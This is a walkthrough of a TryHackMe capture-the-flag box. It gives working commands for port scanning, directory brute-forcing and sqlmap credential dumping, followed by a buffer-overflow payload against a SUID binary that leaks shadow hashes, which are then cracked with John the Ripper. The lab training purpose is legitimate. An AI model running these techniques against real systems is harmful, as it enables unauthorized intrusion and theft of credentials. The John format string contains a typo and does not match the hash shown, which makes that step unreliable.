This write-up may be intended only for those who already finished this box. However, you can have a quick look at it if you’re totally lost.
This box can be found at (login required) : https://tryhackme.com/room/thecodcaper
For this part, I’m using this command :
nmap -p 1-1000 -sV -sS <ip>
-p 1-1000 => Scan only the 1000 first ports
-sV => Get the services’ version (as we’re blind for now, I expected to find a vulnerable service with a CVE)
-sS => Perform a SYN-STEALTH scan
Here is the output of the scan :
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 18:40 CEST Nmap scan report for 10.10.212.142 Host is up (0.029s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
From this output, we can have all the informmation needed to answer the three following questions :
We have 2 ports opened on this machine : 22 & 80
The webpage’s (http:///index.html) title is “Apache2 Ubuntu Default Page: It works”
The SSH version is OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
II – Web Enumeration
For this part, I used gobuster as suggested as long as dirb doesn’t handle files but only directories.
gobuster dir -x php,txt,html --wordlist /usr/share/wordlists/dirb/big.txt --url <ip>
Please note that the path I’m using here only works for the Kali distro. You may need to download it manually if your distro doesn’t come with it natively.
=============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.212.142 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,txt,html [+] Timeout: 10s =============================================================== 2020/04/08 18:48:50 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htaccess.html (Status: 403) /.htaccess.php (Status: 403) /.htaccess.txt (Status: 403) /.htpasswd (Status: 403) /.htpasswd.php (Status: 403) /.htpasswd.txt (Status: 403) /.htpasswd.html (Status: 403) /administrator.php (Status: 200)
I stopped the script as soon as I saw the administrator.php file : I knew it was the ‘important file’ of the server.
III – Web Exploitation
As I knew their won’t be many records in the database, I didn’t use the -all sub-flag.
My exploiting command was tho :
sqlmap -u <ip>/administrator.php --forms --dump
Then we have the 2 credentials that appears… magically :p.
IV – Command Execution
Firstly, I want to say a big thanks to Psyrkoz#0405 & MuirlandOracle#2721 who debugged me. In fact, This part was the most costful in time on the whole box.
At a glance, I think everyone would use this command :
find /* -user pingu
But We have many other users and here www-data is our candidate !
find /* -user www-data
is returning us
on its last line, which clearly shows us the way to go !
V – LinEnum
To ‘inject’ LinEdum into the system, I ran into a rough and raw solution (that I don’t recommend even if I used it) : Copy/Paste the content of linenum.sh through a SSH session (now we have the SSH password of Pingu, let’s exploit it !).
Then I ran this command :
chmod +x ./linenum.sh ./linenum.sh | grep SUID -A30
And as a part of the output, we find this :
[-] SUID files: -r-sr-xr-x 1 root papa 7516 Jan 16 21:07 /opt/secret/root -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo -rwsr-xr-x 1 root root 10624 May 8 2018 /usr/bin/vmware-user-suid-wrapper -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 428240 Mar 4 2019 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6 -rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g -rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount -rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
As we can see, the first line looks pretty… unusual and it is : It’s the answer of this part !
VI – Binary-Exploitation
I choosed to pass through the manual version of this part so I’ll not cover the python part. In fact, the explanation is alreadyb a write-up to it.
After playing a bit with gdb, it looks like the size of our payload has to be 44 chars. Even if it’s said, I really encourage you to (re)discover it by yourself.
Then, to access our shell function, I’ve just pasted the python command they give us :
python -c 'print "A"*44 + "\xcb\x84\x04\x08"' | /opt/secret/root
Which give us an output like this :
daemon:*:17953:0:99999:7::: bin:*:17953:0:99999:7::: sys:*:17953:0:99999:7::: sync:*:17953:0:99999:7::: games:*:17953:0:99999:7::: man:*:17953:0:99999:7::: lp:*:17953:0:99999:7::: mail:*:17953:0:99999:7::: news:*:17953:0:99999:7::: uucp:*:17953:0:99999:7::: proxy:*:17953:0:99999:7::: www-data:*:17953:0:99999:7::: backup:*:17953:0:99999:7::: list:*:17953:0:99999:7::: irc:*:17953:0:99999:7::: gnats:*:17953:0:99999:7::: nobody:*:17953:0:99999:7::: systemd-timesync:*:17953:0:99999:7::: systemd-network:*:17953:0:99999:7::: systemd-resolve:*:17953:0:99999:7::: systemd-bus-proxy:*:17953:0:99999:7::: syslog:*:17953:0:99999:7::: _apt:*:17953:0:99999:7::: messagebus:*:18277:0:99999:7::: uuidd:*:18277:0:99999:7::: papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7:::
VII – Password Cracking
I used John The Ripper (as I get used to it) and the command looks something like this :
john --format=sha521crypt -w /usr/share/wordlists/rockyou.txt papa.hash
And there you are : Root password is owned !
VIII – Conclusion
I found this box pretty easy even if I stuck on the command execution part. A good complement for it would be Vulnversity, which has the same approach for beginners. By the way, I you found any error or have any improvment to share with this write-up, I’m waiting for your PRs :p